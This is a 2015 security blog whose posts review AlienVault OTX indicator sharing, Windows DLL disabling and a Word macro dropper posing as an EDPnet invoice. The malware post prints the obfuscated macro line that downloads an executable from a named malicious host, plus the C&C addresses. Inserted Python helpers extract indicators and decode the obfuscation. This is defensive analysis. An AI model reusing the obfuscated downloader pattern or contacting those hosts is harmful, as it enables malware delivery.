Monday, December 7, 2015

AlienVault Open Threat eXchange Platform

Indicator Sharing

I am currently working on an ISAC and one of the nice things about an ISAC is that the organizations involved can share information about the attacks they encounter. I've been trying out AlienVault OTX this month as a platform for public indicator sharing.

The reason why I did not set up my own platform, like a MISP instance, is that the ISAC right now needs to focus on building trust between the parties involved. OTX allows me to demonstrate the value of indicator sharing in a very simple way.

The AlienVault OTX Platform

As a test case I decided to go with something everybody experiences when connected to the Internet: SSH scans. From experience I know that these scans come in regularly and that the classic ports are TCP/22 and TCP/2222.

There are two ways to interact with the platform, either through the API or through the web interface. I chose the latter since I wanted to know if the platform is actually usable for small organizations with a limited amount of resources and little knowledge about programming against an API. I must say I was amazed at how easy the good people of AlienVault made it.

When you open the platform you get a dashboard that looks like this:

 

Creating a new pulse

When you want to share information you create a pulse. You can either create one from a copy-paste or manually create the indicators.

 

The extractor parses the values you paste and tries to detect the data type of each submitted value. Since I have only submitted IPv4 indicators I can't say I really tested it, but except for one IP it was always spot on. The reason it asked me to verify that one IPv4 address is that it actually looks like a software version number.




When you create an indicator manually you select the type (IPv4, domain, URL, FileHash-MD5, ...) and enter the value in the indicator field. This is slower but of course more accurate. I tried things like submitting the same indicator twice in one pulse and leaving the type empty, and it gently points out the error.
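As an added example (not code from the post and not AlienVault's own extractor), here is a small indicator extractor in the spirit of the one described above. It classifies a pasted blob into the OTX indicator types named above, refangs URLs and domains, drops duplicates within one pulse, and flags IPv4 hits that a human should verify: addresses preceded by a version-like word (the case the extractor caught) and addresses in non-routable ranges, which should never be shared as attacker infrastructure. The sample paste, both heuristics and the pulse field names are assumptions made for this example; check the OTX API documentation before submitting anything built this way.

```python
import ipaddress
import re

# Constructed sample paste (addresses from the RFC 5737 documentation ranges;
# the host names and the hash are made up). Not data from the post.
SAMPLE_PASTE = """\
SSH brute force from 203.0.113.45 on tcp/22 and tcp/2222
198.51.100.7 also hit 2222
203.0.113.45 came back an hour later
scanner banner reports itself as version 10.4.2.1
download: hxxp://example[.]net/ssh-bot.tgz
c2 at ssh-c2.example.org
tgz md5 d41d8cd98f00b204e9800998ecf8427e
"""

URL_RE = re.compile(r'h(?:xx|tt)ps?://\S+', re.I)
HASH_RE = re.compile(r'\b([0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})\b', re.I)
IPV4_RE = re.compile(r'(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})(?![\w.])')
DOMAIN_RE = re.compile(r'\b((?:[a-z0-9-]+(?:\.|\[\.\]))+[a-z]{2,})\b', re.I)
VERSION_WORDS = re.compile(r'\b(?:version|ver|v|build|release)\s*$', re.I)
HASH_TYPES = {32: 'FileHash-MD5', 40: 'FileHash-SHA1', 64: 'FileHash-SHA256'}

# Ranges that must never be shared as attacker infrastructure (assumed list).
# The RFC 5737 documentation ranges are deliberately absent so the sample passes.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    '0.0.0.0/8', '10.0.0.0/8', '100.64.0.0/10', '127.0.0.0/8', '169.254.0.0/16',
    '172.16.0.0/12', '192.168.0.0/16', '224.0.0.0/4', '240.0.0.0/4')]


def refang(value):
    """Undo the usual defanging so the indicator is stored in its real form."""
    return re.sub(r'hxxp', 'http', value, flags=re.I).replace('[.]', '.')


def ipv4_reasons(line, match):
    """Why an IPv4 hit should be reviewed before sharing (empty list = fine).
    Both heuristics are assumptions made for this example."""
    reasons = []
    if VERSION_WORDS.search(line[:match.start()]):
        reasons.append('looks like a version number')
    ip = ipaddress.IPv4Address(match.group(1))
    if any(ip in net for net in NON_ROUTABLE):
        reasons.append('non-routable address')
    return reasons


def extract_indicators(text):
    """Classify every indicator in a pasted blob: one entry per unique
    (type, value), each carrying a list of review reasons."""
    found, seen = [], set()

    def add(kind, value, reasons=()):
        if (kind, value) not in seen:      # a duplicate in one pulse is an error
            seen.add((kind, value))
            found.append({'type': kind, 'indicator': value, 'review': list(reasons)})

    for line in text.splitlines():
        for m in URL_RE.finditer(line):
            add('URL', refang(m.group(0)))
        line = URL_RE.sub(' ', line)       # keep the URL's host out of the domain pass
        for m in HASH_RE.finditer(line):
            add(HASH_TYPES[len(m.group(1))], m.group(1).lower())
        line = HASH_RE.sub(' ', line)
        for m in IPV4_RE.finditer(line):
            try:
                ipaddress.IPv4Address(m.group(1))
            except ValueError:
                continue                   # an octet above 255 is not an address
            add('IPv4', m.group(1), ipv4_reasons(line, m))
        line = IPV4_RE.sub(' ', line)
        for m in DOMAIN_RE.finditer(line):
            add('domain', refang(m.group(1)).lower())
    return found


def build_pulse(name, indicators, tags, tlp='green', include_flagged=False):
    """Shape the clean indicators as a pulse body. Field names are an assumption
    about the OTX pulse JSON for this example; flagged entries are left out
    unless the reviewer explicitly includes them."""
    body = [{'indicator': i['indicator'], 'type': i['type']}
            for i in indicators if include_flagged or not i['review']]
    return {'name': name, 'public': tlp in ('white', 'green'),
            'TLP': tlp, 'tags': list(tags), 'indicators': body}


if __name__ == '__main__':
    iocs = extract_indicators(SAMPLE_PASTE)
    for i in iocs:
        flag = f"  <-- review: {'; '.join(i['review'])}" if i['review'] else ''
        print(f"{i['type']:<16}{i['indicator']}{flag}")
    print(build_pulse('SSH scanners seen this month', iocs, ['SSH']))
```

On the sample, 10.4.2.1 is the only entry that comes back flagged (both as a probable version number and as an RFC 1918 address), the repeated 203.0.113.45 is collapsed into one indicator, and the defanged URL is stored in its real form.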

Sharing The Data

Once you have submitted your data the platform asks you how you want to share it.


You can set a TLP label to indicate how the data should be handled and choose whether the data is public or private. I have only published public TLP Green data. One thing I think is missing is the ability to create groups with whom you share your data.

The tags are handy since you can immediately add context to the pulse. The data I've submitted, for example, is all SSH traffic, so I tagged it with SSH.




You can also add references to a pulse, which I haven't used since I credited my external sources in the description, which seems to me the logical thing to do.

The Indicator Summary

After you've submitted your pulse a summary is generated.



The first part of the summary is a handy abstract of the number of related pulses it found in the database, the number of indicators, the classification and how many people are subscribed to it.

A fun part for management is the country attribution but as we know a computer in China might be hacked by a Belgian who first connected to another system in Brazil. It doesn't indicate where the bad guy is, it just indicates where the connection comes from according to the GeoIP database of AlienVault.

The next part of the page is the list of indicators of compromise you just entered. But the last part is the interesting one.



The related pulses are the pulses already in the system that share some of the indicators. What I would have liked is to see how many indicators are shared. When you click on a pulse you get the actual pulse. It would have been nice if it indicated which indicators are shared and which are not, but unfortunately that is not the case.

 

Data Quality

The worth of a system is, as always, the quality of the data you put into it. I've been a DBA in the past and quite often people were complaining about the CRM database containing "low quality" data. The irony was of course that usually they were the ones who had entered it in the first place.

 

Public Data is Public

To give you a good idea of the data submitted you can actually see the public data without an account.

 

Dashboards

AlienVault is a commercial company and thus they need to do some marketing. One of the nice things to show to convince people about sharing data are the public dashboards:

 

Reputation Monitor

As an incident responder it is part of the job, but it remains a painful experience when somebody else has to tell you that you are compromised. One of the free services that comes with the OTX platform is the reputation monitor, where you register your own IP addresses and domains so OTX can notify you when it has some bad news for you.

Account Issues

In the beginning of November I had some issues with my account but with the help of Bill Smartt these issues were dealt with.

Conclusion

Although I have points of criticism and I haven't shared them with AlienVault yet, I must say I am rather impressed by the platform. I will try to play with the API in the near future and do a follow-up post when I am done.

My ex-colleague Koen Van Impe has written a nice piece on MISP and IBM's X-Force Exchange. If you are interested in the topic, definitely have a look at his guest post on the securityintelligence blog.

I just want to point out one last thing: data remains data. Only you can provide the context of your operational environment, so use the data coming from these platforms wisely.

If you are looking for the IOC's I publish you can find them at https://otx.alienvault.com/erik/

Monday, August 31, 2015

Uploading to Google Mail ... a random observation

Hello,

Last week I was investigating something related to Gmail. I needed to upload a picture from a web server.

When you create an e-mail and want to include an image you click on the little icon and tell it is located on the web server.

What I noticed is that when the image is called 1.gif, Google requests the path after every character typed, so it tried to fetch 1, 1.g, 1.gi and 1.gif.

I would have expected them to wait until I stopped typing but apparently not. Yes, sometimes browsing a log is interesting.

Tuesday, August 4, 2015

Facebook profile delete but not entirely it seems ...

In April 2015 I decided to get rid of my Facebook profile. I first downloaded a report to see what they had about me and then deleted the profile. One can assume that the good people that work there keep their promise and delete the profile.

I am currently working on slides for a presentation about securing your Facebook account and setting up your privacy settings as restrictively as possible. Since I had no account I needed to make a temporary account, with a fake first and last name (I know, against the EULA), and used the same e-mail address as the account deleted in April.

One can suppose that the 'old' data is gone but interestingly every friend Facebook proposes was in the friend list I had before.

I can only come to one conclusion and that is that they do not actually delete everything otherwise those friend proposals should have been random strangers (maybe living in the same town).

Wednesday, July 22, 2015

DLL Voodoo: register, unregister, enable and disable a DLL

DLLs are files on the Microsoft Windows operating system that offer shared functionality to multiple applications (that is my one-sentence definition). To see which DLLs an executable uses you can use a utility like Dependency Walker.

A DLL that implements COM objects has to be registered before its classes can be used; an ordinary DLL is simply loaded by the executable that needs it. Remember that on a 32-bit system the standard location for system DLLs is %windir%\system32. On a 64-bit system the naming is counter-intuitive: %windir%\system32 holds the 64-bit versions and the 32-bit versions are stored in %windir%\syswow64, so a DLL that ships in both flavours has to be handled in both directories, and a 32-bit DLL has to be registered with the 32-bit regsvr32 from syswow64.

To register a DLL:
C:\Windows\System32\regsvr32 filename.dll

To unregister a DLL:
C:\Windows\System32\regsvr32 -u path\filename.dll

This is something I learned being a sysadmin a while back, but what I learned this week with Security Bulletin MS15-078 is how to disable a DLL by renaming it, and how to re-enable it afterwards.

Disabling the dll (the ACL is saved first so it can be put back when re-enabling):
cd dir_path_of_dll
C:\Windows\System32\takeown.exe /f filename.dll
C:\Windows\System32\icacls.exe filename.dll /save filename.dll.acl
C:\Windows\System32\icacls.exe filename.dll /grant Administrators:(F)
rename filename.dll x-filename.dll

The OS needs a reboot for this to take effect.
 
Enabling the dll (icacls /restore takes the directory as argument and applies the entries saved in the .acl file to the files named in it, so run it from the DLL's directory):
cd dir_path_of_dll
rename x-filename.dll filename.dll
C:\Windows\System32\icacls.exe filename.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\System32\icacls.exe . /restore filename.dll.acl

The OS needs a reboot for this to take effect.

Friday, June 12, 2015

3267298_2015061035.doc - MD5: 8ca62e90fea72d491a3933597b51d19f

Today a quick post about a piece of malware that I analyzed a couple of days ago. It reached the victim by mail. What was new was that it posed as a bill from the Belgian ISP EDPnet and that the e-mail was written in Dutch without any spelling errors.

It looked like a legitimate e-mail from EDPnet, although the IP address of the sender gave away that it came from Brazil:

Received: from user-186-237-165-130.inova.net.br (186.237.165.130)
MIME-Version: 1.0
To:
Date: Tue, 9 Jun 2015 04:00:46 -0200
Subject: Uw edpnet factuur 2015061035

The attachment was a Word document with a macro in it. The MD5 of the attachment was 8ca62e90fea72d491a3933597b51d19f. At the time of analysis only 2 AVs on VirusTotal recognized it. The first submission was at 2015-06-09 07:20:08 UTC and the document's codepage is Cyrillic.

I used OfficeMalScanner by Frank Boldewin to dump out the macro code:

C:\>OfficeMalScanner.exe 3267298_2015061035.doc info

Interestingly it dumped out 5 files:
  • Module1
  • Module3
  • Module4
  • Module5
  • ThisDocument
Module1 is written in English and contains well documented code. In the code we found the following:

If InStr(1, d.Application.OperatingSystem, "NT") Then
    '
    ' Use this line with Windows NT:
    '
    winDrive = Left(Environ("WINDIR"), 3)
    Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
Else
    '
    ' Use this line with Windows 95/98:
    '
    winFolder = Environ("WINDIR")
    Shell winFolder & "\dialer.exe", 1
End If


As you can tell from the comments, this is code that dates from a while back.

In Module3 we again have very nicely documented code written in English; the coding style resembles the code from Module1.

Module4 and Module5 look like clean code but contain the malicious part. It uses the same principle as other macro malware: it creates an XMLHTTP object and uses it to fetch the payload. The method name, the HTTP verb and the URL are not stored as readable strings; they are assembled at run time from Chr() calls and short literals and invoked through CallByName, so a string search of the module finds nothing. The call that fetches the payload is:

CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & Chr(112) & Chr(58) & "/" & Chr(47) & "p" & Chr(122) & "i" & "e" & Chr(110) & Chr(116) & Chr(97) & "r" & Chr(97) & Chr(46) & Chr(112) & Chr(108) & Chr(47) & Chr(52) & Chr(50) & "/" & Chr(49) & Chr(49) & ".e" & Chr(120) & Chr(101), False


It translates to a GET of hxxp://pzientara.pl/42/11.exe. Unfortunately I didn't get my hands on this executable, but when analyzing the log files I noticed that the victims requested the same URL (since they received the same Word document) yet downloaded it from different IP addresses within a time span of less than 30 minutes. The IP addresses were:
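Decoding such a line by hand is error-prone, so here is an added example (my own code, not part of the post or of the malware) that tokenizes the VBA `Chr()`/literal chain and splits the CallByName statement into its decoded arguments. It also handles `ChrW`, `Chr$` and doubled quotes inside literals, which the sample above does not use. The SAMPLE constant is a copy of the obfuscated line from the post, split over several Python string literals.

```python
import re

# Copy of the CallByName line dumped from Module4/Module5 in the post, broken
# over several Python string literals; the content is unchanged.
SAMPLE = (
    'CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, '
    'Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & Chr(112) & Chr(58) & "/" & '
    'Chr(47) & "p" & Chr(122) & "i" & "e" & Chr(110) & Chr(116) & Chr(97) & "r" & '
    'Chr(97) & Chr(46) & Chr(112) & Chr(108) & Chr(47) & Chr(52) & Chr(50) & "/" & '
    'Chr(49) & Chr(49) & ".e" & Chr(120) & Chr(101), False'
)

_TOKEN = re.compile(
    r'Chr[WB]?\$?\(\s*(\d+)\s*\)'   # Chr(110), ChrW(110), Chr$(110)
    r'|"((?:[^"]|"")*)"'            # "literal"; a doubled quote is an escaped quote
    r'|([A-Za-z_]\w*)'              # identifier or keyword
    r'|(,)|(&)|\s+'                 # separators and whitespace
)


def tokenize(expr):
    """Yield ('str', text), ('ident', name), ('comma', ','), or ('amp', '&').
    Chr() calls and literals both become 'str' so the caller can join them."""
    pos = 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f'unexpected text at offset {pos}: {expr[pos:pos + 12]!r}')
        pos = m.end()
        code, lit, ident, comma, amp = m.groups()
        if code is not None:
            yield ('str', chr(int(code)))
        elif lit is not None:
            yield ('str', lit.replace('""', '"'))
        elif ident is not None:
            yield ('ident', ident)
        elif comma:
            yield ('comma', comma)
        elif amp:
            yield ('amp', amp)
        # whitespace yields nothing


def decode_vba_concat(expr):
    """Collapse a chain such as Chr(79) & Chr(112) & "e" & Chr(110) into 'Open'."""
    return ''.join(text for kind, text in tokenize(expr) if kind == 'str')


def decode_callbyname(line):
    """Split 'CallByName obj, name, calltype, args...' into decoded pieces.
    String chains are decoded; bare identifiers (the object variable,
    VbMethod, False) are kept as written."""
    args, current = [], []
    for kind, text in tokenize(line):
        if kind == 'comma':
            args.append(current)
            current = []
        elif kind != 'amp':
            current.append((kind, text))
    args.append(current)

    head = args[0]
    if not head or head[0] != ('ident', 'CallByName') or len(args) < 3:
        raise ValueError('not a CallByName statement')

    def render(parts):
        joiner = '' if all(kind == 'str' for kind, _ in parts) else ' '
        return joiner.join(text for _, text in parts)

    return {
        'object': render(head[1:]),
        'method': render(args[1]),
        'calltype': render(args[2]),
        'args': [render(a) for a in args[3:]],
    }


if __name__ == '__main__':
    call = decode_callbyname(SAMPLE)
    print(f"{call['object']}.{call['method']}({', '.join(call['args'])})")
```

Run against the sample it prints `HOPPOJJ2233.Open(GET, http://pzientara.pl/42/11.exe, False)`, i.e. the `Open` method of the XMLHTTP object called with the verb, the URL and a synchronous flag.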
  • 87.98.239.19
  • 178.238.237.230
  • 5.39.61.17 
Since I had victim machines at my disposal I had a look at what the C&C servers were and found that the machines were making outbound connections to:
  • 173.230.130.172:2443
  • 31.186.99.250:8443
  • 94.23.53.23:2443
When we look at the IP 87.98.239.19 in VirusTotal's passive DNS we see that multiple samples were hosted there following the same naming logic, namely hxxp://pzientara.pl/42/11.exe and hxxp://pzientara.pl/15/10.exe.

Analysis of the IP 178.238.237.230 in VirusTotal's passive DNS gives no result for hxxp://pzientara.pl/42/11.exe.

Finally, the IP address 5.39.61.17 in VirusTotal's passive DNS did not give any results for hxxp://pzientara.pl/42/11.exe either.


As a last step I wanted to have a look at the geographical spread of the C&C servers: 173.230.130.172 is in the USA, 31.186.99.250 is in Russia and 94.23.53.23 is in France.